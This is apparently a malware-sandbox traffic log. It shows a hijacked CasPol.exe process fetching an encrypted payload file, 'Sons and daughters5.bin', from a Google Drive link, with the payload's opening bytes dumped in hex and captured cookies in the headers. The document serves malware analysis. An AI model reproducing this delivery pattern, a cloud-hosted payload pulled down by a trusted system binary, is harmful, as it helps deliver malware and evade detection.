                                                                                    2021-11-23 13:42:43 UTC411INData Raw: 28 3a 8f 52 0c 77 64 05 04 e1 e2 d1 ec 3c 59 bc e1 d5 10 04 ac 98 ae e4 6e 9c a4 78 ad 87 e9 2f 4d e3 d0 b9 ec 71 9b 2f 80 9e 6b 90 fb b3 12 18 6c 09 77 71 3e 2c d6 82 9b 7a 29 78 e3 67 8e 82 7e 5b d9 65 88 8b ce fc a8 d8 42 03 b6 29 4f 31 ea 66 0f 87 c6 aa 61 3d 38 b3 5e 74 e5 46 d6 5f b2 c8 8b 82 a6 fb 7d eb 78 4d 64 e4 5e c7 fd 92 a6 93 0d 07 f9 64 6d 62 f9 7d 7d 6d b5 fb 4c 8c 1d 2f 7a 16 db b3 ea ff e2 d3 0c aa 04 78 1f 04 3e 43 29 b9 15 26 35 fa 8e 26 b5 0f 68 9a e1 68 76 eb f7 53 10 25 9a a7 63 e6 01 c4 24 88 ce fd ea 17 52 a0 d3 a3 c2 23 4d d2 8e 4b b8 68 2c ab 45 8a 65 4d 48 3c ae 12 cc cb 2f b6 bd 7b 0c 85 78 b5 23 86 19 10 5b 36 08 76 e8 88 96 6c 9d f1 87 91 f0 fe 34 ed 67 2f f7 f6 65 65 dd 9d 52 ec 7b 75 90 6b 04 2d 4b 4d 1d 59 c0 15 be 06 f8
                                                                                    Data Ascii: (:Rwd<Ynx/Mq/klwq>,z)xg~[eB)O1fa=8^tF_}xMd^dmb}}mL/zx>C)&5&hhvS%c$R#MKh,EeMH</{x#[6vl4g/eeR{uk-KMY
                                                                                    2021-11-23 13:42:43 UTC412INData Raw: 7e 3e d2 24 5a fb 46 c5 0b 00 18 55 27 c7 e7 12 8f 34 0e 42 8c 6d fb 1e b1 b9 2d 23 e1 09 7d 80 d9 c5 c3 47 e6 98 8c 3c 95 e1 b6 c5 81 34 a0 66 07 52 28 63 5f 71 71 7e 97 2e ff 6a de 5f f7 77 7c 62 ed 2a 7d 15 7a ad 52 a1 08 ea d0 70 fd ad d4 2f a7 c5 5a cd ef 55 ae bb 4b 84 bf 2e 97 b2 f7 15 a3 b7 66 60 2c af 1f 99 79 05 67 d9 2b 85 c1 c5 22 98 9f f6 cf e2 22 c1 96 0c dd 2b 38 f4 cd 6c 35 58 43 6c 9f aa 86 48 83 b6 b4 f8 8f 53 23 f8 01 28 46 85 a8 58 9e 66 03 11 64 ca 9a 7d 5e 8f 30 32 ec e5 b2 db 5b f1 ff 04 5a b9 46 e5 25 38 75 38 cd da 18 bc cb f5 c3 a8 05 26 ca c5 74 b4 26 a3 3d bb 2b 20 ae 5a 15 fc 6f b3 13 ff e2 ed 0a 37 b6 3b cd 1e 0b 16 99 68 7c 27 ae c4 ad 7e 7e ad 45 31 af 51 b9 79 0d 36 b9 22 94 09 36 6b f4 92 98 3a 80 50 f4 95 9d a1 6b 72 6f
                                                                                    Data Ascii: ~>$ZFU'4Bm-#}G<4fR(c_qq~.j_w|b*}zRp/ZUK.f`,yg+""+8l5XClHS#(FXfd}^02[ZF%8u8&t&=+ Zo7;h|'~~E1Qy6"6k:Pkro
                                                                                    2021-11-23 13:42:43 UTC414INData Raw: 4d 40 3c 62 a9 0a 4b 7a 96 98 82 2d c5 e8 84 17 df 92 e6 a8 44 73 81 02 c7 57 e3 97 d5 7e 24 13 d6 d2 23 b4 e5 86 2b b9 d6 d8 89 33 c3 9d 4c fd f3 c3 d4 25 86 44 a8 fe 1f b3 de 42 93 15 32 26 06 05 e9 9c 86 00 66 89 8e de ba 00 87 c6 7b 60 c7 53 6f c1 8f 6b 15 40 d1 f7 3e fa 9b 13 f1 6a 6e 92 f6 d6 05 2b 85 36 1a 29 49 55 f0 19 33 73 34 d7 91 f3 20 3a 3c c2 d5 19 9f 53 3a 65 8a bd 40 db d1 dc 4f 71 98 6d 77 33 8d c5 3c c7 88 95 bf 97 5c b3 f2 54 44 a5 95 41 b8 78 e2 a7 65 aa 45 e1 ba f4 57 ea d9 69 e9 32 2d 51 dc c9 af fd fa a2 b3 f2 34 7c 6a 07 eb 71 36 03 33 c3 52 ae f5 59 1c bc ed 7e 80 3a 01 d2 37 17 78 14 24 75 7f df 71 31 a5 57 6b 31 4a 4d 0b 6d ed 46 10 55 e8 44 78 8e 30 73 cd c3 28 9b e8 45 bb d4 67 35 1c 80 bd ee ad ce b4 fc 90 ff 64 41 70 e3 07
                                                                                    Data Ascii: M@<bKz-DsW~$#+3L%DB2&f{`Sok@>jn+6)IU3s4 :<S:e@Oqmw3<\TDAxeEWi2-Q4|jq63RY~:7x$uq1Wk1JMmFUDx0s(Eg5dAp
                                                                                    2021-11-23 13:42:43 UTC415INData Raw: ec 25 75 a6 94 6a d2 22 3a 21 b6 a7 f5 f9 9f 0f 60 61 93 7b bf 65 b4 37 e2 50 fc ca 37 c1 3e 3e f3 6d 14 ed c7 2a 15 2f 3c 05 5b b8 2d 86 87 2a 32 ba a6 be cc e5 bd ac ef 6a eb 64 4c b4 a9 af 4a 41 cd c0 6c 19 69 f1 6e 66 8c e4 32 11 96 77 df 35 d2 b2 e1 6f 05 1c 20 9c ec b9 e3 10 c0 dc f6 87 0d 45 1f a5 0f 6f 33 bd 62 3e c3 62 86 79 f4 fd 75 1e ad 39 1c e5 2a 79 94 c7 40 f3 82 8b c1 73 fa 8d 8b 8a 00 9f a3 45 d6 ea 1a ff 1c 9a 06 d0 1d 23 c6 d8 f1 81 a6 38 d3 15 00 c0 e1 0c b9 3a a8 47 d0 17 f0 99 f8 ef fb bf 16 a2 3f 12 d3 5e 70 05 8e 6d 0a be 03 f1 94 cc fc ab 2c a3 eb 0a 24 49 08 0e 2e 37 e6 95 7a 53 0b f8 29 d2 9a 29 c0 f0 41 4c 71 03 a0 6d 3c c4 ba 3a 7b 09 70 3d 98 2a 8b 6e d4 d1 0d 23 39 40 33 f1 d3 a4 e7 ec cd 08 5a 96 94 a6 31 34 c9 b8 df 2a 44
                                                                                    Data Ascii: %uj":!`a{e7P7>>m*/<[-*2jdLJAlinf2w5o Eo3b>byu9*y@sE#8:G?^pm,$I.7zS))ALqm<:{p=*n#9@3Z14*D
                                                                                    2021-11-23 13:42:43 UTC416INData Raw: a9 28 fb e5 c9 80 99 4c 26 ce a4 6f 23 b5 9b da 89 5d 5f e1 64 a5 07 de ad b7 a3 bb 06 df c0 4f 9e 2f 64 2c 64 e9 c9 98 c0 fe aa 7f c5 da 41 c0 7a c5 40 79 a8 00 e8 12 74 f3 34 89 3f 77 47 db 6e c9 fa db 8d 88 aa ae 3a 02 f8 1b 98 4d a6 6c ec 50 6b e6 d4 3b 5c 5e d7 37 38 b1 47 6a 68 2d 93 82 f2 f8 65 75 4c df d8 aa 59 35 5e 00 8d 25 25 c0 01 e7 e6 96 3c 9e cb fe b3 ef 23 37 9c 77 c5 a6 ee 82 c3 81 3f 9d 81 1f 2e a4 26 db fa e1 d2 c2 76 bb 52 c5 14 52 44 53 83 bf d4 d5 55 73 54 62 c2 86 c8 76 64 79 c2 5f 87 6f 74 01 c0 ab 40 2f 04 de 39 ba 19 0f 47 57 74 bc ae c0 09 37 53 e8 28 cb 65 d0 1a 38 8d 3b 3b e4 43 ff 18 2e e9 7e a9 09 40 f1 66 aa 40 d7 a1 c5 61 24 7b 2a 53 ce 99 5c 68 1f f5 19 5d 5c 87 01 41 8f 50 85 e3 ff 6c ee b6 92 82 9e 00 ba 61 28 da b1 d5
                                                                                    Data Ascii: (L&o#]_dO/d,dAz@yt4?wGn:MlPk;\^78Gjh-euLY5^%%<#7w?.&vRRDSUsTbvdy_ot@/9GWt7S(e8;;C.~@f@a${*S\h]\APla(
                                                                                    2021-11-23 13:42:43 UTC417INData Raw: 7c 7f 1d f2 55 3f 48 b3 ff 61 a0 27 45 af a7 55 ac ac 90 86 06 f2 55 8d 12 6e 9c f1 5e 59 9f 55 4e 10 1a 6d f2 49 15 1b 89 b6 35 7c 3e 1d 46 aa 8c b9 36 d8 94 16 11 f8 3f a9 b0 13 85 c4 74 80 21 e6 5d ed 13 5a 8d d6 2b 2a 56 b0 b8 bc 0f 51 2d 83 88 92 31 f3 32 60 7a 18 a3 cb a8 66 25 87 3e 70 98 51 69 9c 8e 2c 19 68 23 52 3b a8 c8 66 3e 41 3d 52 cb 56 7f 6f 7c 26 27 fd ce 43 52 38 2c bb 41 8a 2e 98 b1 96 99 5e 2c c8 f2 f3 a4 56 f2 ee eb a8 70 e3 0a 97 31 2c c5 76 70 b5 3c 89 fb b2 6b 78 b2 4f 91 3a 95 c6 e2 14 f3 e1 14 63 1a 42 66 97 0b e4 f6 fe f0 53 c4 b6 bd fe 58 df b7 1f 2f 4d 00 d7 bc 46 ce 89 44 18 cb 90 78 9d 68 71 93 d1 ee be 26 cf aa b7 8c 4a a4 2d 8f 62 5d 93 9c eb e0 77 46 4f 59 83 ea ed 2e b8 e8 3f 38 e7 31 b6 11 4e 77 da 48 4e eb 9d af 3d dd
                                                                                    Data Ascii: |U?Ha'EUUn^YUNmI5|>F6?t!]Z+*VQ-12`zf%>pQi,h#R;f>A=RVo|&'CR8,A.^,Vp1,vp<kxO:cBfSX/MFDxhq&J-b]wFOY.?81NwHN=
                                                                                    2021-11-23 13:42:43 UTC419INData Raw: 56 28 a5 cb 94 db 63 0f 62 f5 d3 69 30 d3 ae 01 92 6a 06 f6 47 df c4 22 56 be 3b 40 d6 82 58 d2 06 cd e8 a3 fa b6 39 c1 4d 1f 23 4b e1 7f a3 5d 37 8f 47 c7 06 f5 ac 54 2e 5f bf 28 ac 9d 0e 19 3d 2c d4 8f 34 8b 81 22 77 86 0b 61 e5 84 e9 6a 15 95 30 fe f6 36 97 71 44 3b 5d 6d 78 1a 7c 0d 48 0f 61 2c 16 2d 57 19 69 cc b1 cf 2e c4 06 15 23 cc 8e 8e 44 0d 38 49 c3 13 3b 5b 26 b2 79 d3 97 4f 2f bc 62 e3 4f 70 7b 89 80 40 bc 1c 79 8d 6b 87 f0 62 5b a3 e3 5a 0e f7 23 00 0b 08 c9 63 10 d9 bb 5e 7e bc a5 a8 dc d5 95 bc c8 98 54 fa 00 8c 6c dd e5 58 14 7b 13 38 95 e3 8a d5 0c 07 8a e8 a3 d6 18 11 95 ed 5e dd 74 3f a5 ed d9 2d 97 60 79 61 0e d0 38 db 07 14 ef a9 df 90 18 65 68 d4 a8 3c 3d 49 5f 8a 45 e1 b7 76 8c 9e 7e 52 d9 7a 4b fc 9b 99 4a 17 41 08 5a c7 3c 29 a6
                                                                                    Data Ascii: V(cbi0jG"V;@X9M#K]7GT._(=,4"waj06qD;]mx|Ha,-Wi.#D8I;[&yO/bOp{@ykb[Z#c^~TlX{8^t?-`ya8eh<=I_Ev~RzKJAZ<)
                                                                                    2021-11-23 13:42:43 UTC420INData Raw: e1 d4 97 f0 55 02 52 53 db e7 ee 41 e8 04 e6 d8 ab 5c e4 44 cb 6f b0 0f ff c2 46 7d 55 30 1c 16 7a 2a b0 2f 37 87 43 29 85 89 dc 2c c2 6a 4e 36 fe f1 49 64 d1 92 99 3b d7 b0 48 a1 98 3e fc fe 5b 4a 5d 56 83 b6 fd 8e fe a8 ea 2c a2 ed 80 64 9e 12 e2 0b e7 a3 ec 9c 41 c6 8f c8 0f 1e 2e c6 43 fd 1d c5 7b f9 f4 cf b0 4b 61 34 ff df 21 38 01 dc e3 4e 33 cf e3 c9 08 5d 42 46 9f 4f 97 11 2c b0 80 b9 3f 19 61 62 4b fe a0 d4 f1 ef ab ac 93 8f 15 cf 82 36 05 d8 1a d8 7f 7b 75 69 c2 50 d3 c3 a1 84 0d 63 b0 8a 93 14 b4 77 0f 77 23 d7 53 2f 3a 0c 48 94 ec bd 4b 67 27 7f a7 52 bf 56 85 97 98 a7 81 6a e5 35 e2 ce e8 2d 49 87 13 38 6a aa c3 2e 06 7f e7 14 79 6c a7 ed fb e0 57 d5 6a 6f a7 a8 85 f7 8b 1b 90 54 9d 14 ff 6f 84 e0 6b 91 9c 29 cd b9 3b 2c 1a ea 56 2b 45 fb 8a
                                                                                    Data Ascii: URSA\DoF}U0z*/7C),jN6Id;H>[J]V,dA.C{Ka4!8N3]BFO,?abK6{uiPcww#S/:HKg'RVj5-I8j.ylWjoTok);,V+E
                                                                                    2021-11-23 13:42:43 UTC421INData Raw: 7f 1a c5 a9 19 61 9c f1 3f 3b e8 99 1d fc f6 14 08 e5 63 fe c7 de de 8e 07 55 dc ef fb 79 93 dc 3e c8 8d 30 e7 1c 9b 3b 31 b0 1d cf 1d 0f 3d 35 b4 13 cc f0 ce be fa 39 0a 43 8c 50 3d 3d ec 54 35 39 ae 2e 0a a8 e7 1f b7 52 25 d1 68 e3 49 2f 13 79 3d fe 75 fd 87 ae 06 ef 1e 5c 1f d9 8f 68 d1 92 1b 83 b0 6d 44 9f a3 11 57 75 a9 71 d7 34 83 8b fe 8a 2e 4a 34 08 fe e3 2d 00 f8 b1 13 d3 f4 73 fc be 73 3e 11 8b 7e de db a8 ed 66 04 32 ca 52 b4 ac c4 6c 74 8a 42 23 92 42 17 11 cb 80 cd c2 c2 d3 94 f4 29 bc cc ca f7 3d 29 0f 87 4d 0f 20 46 b6 96 fb 31 51 55 3d 29 7d 80 d7 2c dc d7 c8 60 ca 9b df 4f cd f4 87 b1 1b bf c1 f1 58 23 96 40 89 de 9c 7f 1d 89 15 98 33 9f 12 c0 c1 b5 15 39 56 98 23 10 16 92 36 74 74 24 43 43 36 71 f2 de 3a 59 40 4e 19 ac 7a 06 13 9e 0e f9
                                                                                    Data Ascii: a?;cUy>0;1=59CP==T59.R%hI/y=u\hmDWuq4.J4-ss>~f2RltB#B)=)M F1QU=)},`OX#@39V#6tt$CC6q:Y@Nz
                                                                                    2021-11-23 13:42:43 UTC422INData Raw: 7a 97 fc 7b b0 15 d4 6d 05 11 45 6d aa 5a d2 5e 1e 32 14 7c 78 38 a4 57 73 10 66 c7 d3 0a 72 8d 2c d8 ac b1 9a 9d 1f 9f 02 ac 22 b5 6f 2f 9d 83 0f 0f 30 a4 e3 7c a7 a7 5e ec 58 ef ff ef 6c b8 9a 46 c0 73 b5 c2 bf 40 84 31 27 b4 63 12 88 f2 14 04 62 d0 21 de d6 87 4a f0 c4 e2 aa 5d 09 98 e7 6e 73 21 b4 8b 89 e2 09 92 14 c9 d9 52 4a 8f 4b 27 e2 8c e7 ca 5c 79 7f 69 bf 1f e4 25 dc f5 37 ae 8f 4e 1f 5c aa f7 e7 de 1a a6 7a 32 67 87 e1 20 6b 79 65 d2 71 63 d3 46 05 1a 28 3f 4b 2e 92 1d 9b 91 85 ba 65 da 9b 2c 25 d4 83 ec 0d d8 a5 39 fc 52 b2 c2 0f bf 92 d1 5c d1 2e 48 9a e7 6f 0d ac 2e 13 6b 36 9d 58 f4 94 03 ff 1c 6a 44 06 41 65 e2 0d 4f ae e4 c3 8b c4 82 c9 c7 99 c0 1c 96 30 96 be 2f 71 a7 85 5a 66 c3 74 66 60 1b f9 79 82 14 53 fe 7f 69 16 52 ac 6f 03 62 32
                                                                                    Data Ascii: z{mEmZ^2|x8Wsfr,"o/0|^XlFs@1'cb!J]ns!RJK'\yi%7N\z2g kyeqcF(?K.e,%9R\.Ho.k6XjDAeO0/qZftf`ySiRob2
                                                                                    2021-11-23 13:42:43 UTC424INData Raw: 98 eb 7c 09 6f 26 57 1f df 65 3a 3d 55 45 8f c3 7e 95 df d7 95 90 6d 09 3a d4 67 02 c0 29 07 80 89 83 00 cb 6c 70 cd 06 cb 63 88 c7 51 41 d0 34 ed ee f9 70 01 bd 3d 8e 55 d0 7f 91 46 75 74 c7 c5 89 5a 28 d7 24 4f 59 b3 94 3f 45 bc a6 e5 9c 4e f1 ab 79 89 d6 25 98 96 4f c1 5c 01 f7 21 0a 75 54 4f 54 82 a7 cf f6 72 1f f8 7d d9 10 d5 3a c7 8e 46 77 c0 45 0e 9c a5 a8 08 7e ac 93 ce eb d7 55 5c ab 54 37 ae a6 3d 4a 36 bc 05 43 f6 85 c6 50 fb 41 a5 4a 9b 56 87 75 6e 61 3d e7 19 81 21 78 00 62 60 96 ea 4e 7d 6e 9a 72 f4 7d a7 21 98 4d bf 9f 6a d8 40 49 5d de 15 ed ad cd 4f 4d 95 8c 31 98 fe 8a 34 2c 9e 24 23 7b dd 9e 26 f1 c7 f1 89 cd c7 78 2b 67 e4 73 35 1e b8 b6 8c df 9e 85 ae 29 f1 eb ba ec 15 67 4b 79 fc 38 21 bf 73 78 39 9f c9 51 70 64 96 4d 03 fc 54 58 0b
                                                                                    Data Ascii: |o&We:=UE~m:g)lpcQA4p=UFutZ($OY?ENy%O\!uTOTr}:FwE~U\T7=J6CPAJVuna=!xb`N}nr}!Mj@I]OM14,$#{&x+gs5)gKy8!sx9QpdMTX
                                                                                    2021-11-23 13:42:43 UTC425INData Raw: ec 89 94 95 4e 3e 2e af b0 8a b0 5f 45 ce ed 41 7e 43 c4 cf b0 31 0d 38 01 1d 67 8e 97 e7 08 ad e7 ba 76 cc a7 0e 73 38 f9 fa 5f 72 18 a0 27 4a e9 63 93 f1 7f 2e 33 57 26 47 4d 38 04 71 a6 95 9d 02 69 aa 44 d6 a5 ff 46 87 55 0e 79 4e 81 e5 c2 90 80 2a 0f fc c8 52 24 af 4b 7c f4 b1 47 72 dd 91 d2 a4 0d 1f cf be e4 be 9d 71 7f 80 0e c1 1c e7 b7 72 52 5d ab 13 65 ae ba 9c 39 50 76 1a ec f3 e9 5e 4b e3 1b d6 76 25 86 91 17 b3 eb 87 7d 75
                                                                                    Data Ascii: N>._EA~C18gvs8_r'Jc.3W&GM8qiDFUyN*R$K|GrqrR]e9Pv^Kv%}u


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    6192.168.11.2049845142.250.186.174443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-11-23 13:42:54 UTC425OUTGET /uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
                                                                                    Cookie: NID=511=O2-FXr5qY76nLIjQxvu2_dNxwEtEAZmUxKDF6y584Qjx7NM545C5PIS_SocNxTJxEK5_KchPEN01o4qyMmQxmKaggD7ecYWx2bdodOikTvrlJfMoyHbS4cvhS_Kk8QF7TyLxZO5NB5GVwXIvTg82PL1VoDOvxQvyU_6Z1TC1nUE
                                                                                    2021-11-23 13:42:55 UTC426INHTTP/1.1 302 Moved Temporarily
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Tue, 23 Nov 2021 13:42:55 GMT
                                                                                    Location: https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download
                                                                                    Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                                                    Content-Security-Policy: script-src 'nonce-6u6PvDlwfgSrGwMtRYIfLQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                                    Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Server: GSE
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Accept-Ranges: none
                                                                                    Vary: Accept-Encoding
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    2021-11-23 13:42:55 UTC427INData Raw: 31 39 38 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e
                                                                                    Data Ascii: 198<HTML><HEAD><TITLE>
                                                                                    2021-11-23 13:42:55 UTC427INData Raw: 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 34 2d 33 67 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 6d 33 6a 39 6e 61 6a 69 65 6a 6e 64 6a 63 6b 30 64 68 76 70 66 66 37 34 32 73 70 6a 6a 37 6f 36 2f 6d 71 66 74 6f 66 34 74 72 36 6b 37 67 69 64 31 33 6b 36 71 36 69 6b 6f 67 66 70 64 31 6b
                                                                                    Data Ascii: Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k
                                                                                    2021-11-23 13:42:55 UTC427INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    7192.168.11.2049846142.250.185.161443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-11-23 13:42:55 UTC427OUTGET /docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Cache-Control: no-cache
                                                                                    Host: doc-04-3g-docs.googleusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    Cookie: AUTH_9aqatk3osmsaaots2gjte2gg27aqr5r0=08866698715000929587Z|1637674950000|oi06qm5ps09ba9vtmvui6gpdeopbgkfu
                                                                                    2021-11-23 13:42:55 UTC428INHTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: ADPycdvwB8otAGu0vtlN2JIBiBfc2iLRe46THDVtFUT9uQ8r1Wj4uU0kniE_QrIKtO5UBVTlU6OQDQ6LbFNpySPfWew
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                                    Access-Control-Allow-Methods: GET,OPTIONS
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Disposition: attachment;filename="Sons and daughters5.bin";filename*=UTF-8''Sons%20and%20daughters5.bin
                                                                                    Content-Length: 207936
                                                                                    Date: Tue, 23 Nov 2021 13:42:55 GMT
                                                                                    Expires: Tue, 23 Nov 2021 13:42:55 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=nwHAxw==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Connection: close
                                                                                    2021-11-23 13:42:55 UTC431INData Raw: f5 ef 03 ce 5b 17 1f b1 0d 53 b4 ca ba 68 c0 6b 7a 9c 07 d9 1d 84 3c db 83 31 26 fe f8 41 08 ad dc b4 9a ce d4 b8 40 c3 2a 51 84 6e f5 33 f4 30 15 23 68 53 32 68 88 da dc 09 9f a6 2a db 9c b0 23 81 90 de ba be 78 45 ac 2a 11 0a 23 57 c8 77 1f 1e d2 50 b3 b6 8b 48 51 60 7a bb 5f fa 2f 24 e1 fd b7 95 61 49 dc 83 5a 43 f5 53 f0 c8 eb 22 f4 0b 0e 31 5f 29 e1 cd 93 69 82 e5 c9 5b 86 f0 ad f9 7f 2f 3e 70 43 45 73 18 e6 7f db 38 b6 35 4b 85 c2 bc 0a 7b 55 21 c3 d9 99 7c 6e c9 3c f7 45 5d bc a4 76 85 da a0 13 5b db a2 37 84 46 3d 6e 0a 45 d9 ed 64 a1 a9 db 56 0d 26 13 10 ef 4e 7d 91 f5 d4 65 af f8 dc 9d 69 9d 04 1b b0 f7 ab eb 7e 69 99 18 08 98 a8 48 17 97 12 f5 96 e3 03 6d 01 e5 4e 3e 95 8b ab 5b f1 2f 85 23 fb 24 70 d6 88 05 72 74 08 d0 7c 2c 79 40 88 76 64 0a
                                                                                    Data Ascii: [Shkz<1&A@*Qn30#hS2h*#xE*#WwPHQ`z_/$aIZCS"1_)i[/>pCEs85K{U!|n<E]v[7F=nEdV&N}ei~iHmN>[/#$prt|,y@vd
